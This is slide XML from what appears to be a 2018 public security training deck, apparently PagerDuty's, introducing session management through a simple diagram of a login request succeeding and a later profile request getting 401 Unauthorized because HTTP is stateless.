          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2060" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Session Management"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Session Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2062" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15518679" y="2772907"/>
            <a:ext cx="8535085" cy="8170186"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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6" name="5331336772_b43071390b_o.jpg" descr="5331336772_b43071390b_o.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="15000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4928" y="-332103"/>
            <a:ext cx="24393855" cy="14638890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2067" name="Being able to identify a user over multiple requests."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Being able to identify a user over multiple requests.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2068"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206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070" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2071" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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6" name="HTTP is stateless."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>HTTP is stateless.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2077"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078"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079" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2080"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fast"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4" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.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085"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086" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2087" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2088" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240080" y="4679430"/>
            <a:ext cx="4158788" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2089" name="www.png" descr="www.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15985098" y="4679430"/>
            <a:ext cx="4158788" cy="4158788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805734" y="5633683"/>
            <a:ext cx="6772500" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="/account/login"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8869998" y="4613104"/>
            <a:ext cx="3082244"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3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>/account/login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2092" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805734" y="6240902"/>
            <a:ext cx="4943816" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2093" name="200 OK"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13958375" y="5909114"/>
            <a:ext cx="1619859"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sz="3400">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>200 OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2094" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805734" y="7864899"/>
            <a:ext cx="6772500" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2095" name="/account/profile"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8878809" y="6844319"/>
            <a:ext cx="3370462"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3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>/account/profile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2096" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8805734" y="8472117"/>
            <a:ext cx="2478635" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:srgbClr val="C82606"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097" name="401 UNAUTHORIZED"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11270054" y="8193692"/>
            <a:ext cx="4426348"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sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FF320A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>401 UNAUTHORIZED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2102" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2309309" y="1838495"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2098" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2099" name="Hi, I’m Bob! Here’s my password."/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Hi, I’m Bob! Here’s my password.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2100" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2101" name="1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2107" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14054360" y="1838495"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2103" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="25C151"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2104" name="Hi Bob! Nice to see you!"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="25C151"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Hi Bob! Nice to see you!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2105" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="2106" name="2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2112" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2309309" y="10214843"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2108" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2109" name="Can you show me my profile?"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Can you show me my profile?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2110" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="338667" y="305386"/>
              <a:ext cx="814898" cy="814899"/>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353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2111" name="3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288298" y="311197"/>
              <a:ext cx="915635"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a:solidFill>
                    <a:srgbClr val="353535"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2117" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14054360" y="10214843"/>
            <a:ext cx="8020330" cy="1464311"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8020329" cy="1464309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2113" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="8020330" cy="1464310"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13010"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>
            </a:solidFill>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FF320A"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2114" name="Who the hell are you?"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1266262" y="432117"/>
              <a:ext cx="6648730"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3000">
                  <a:solidFill>
                    <a:srgbClr val="FF320A"/>
                  </a:solidFill>
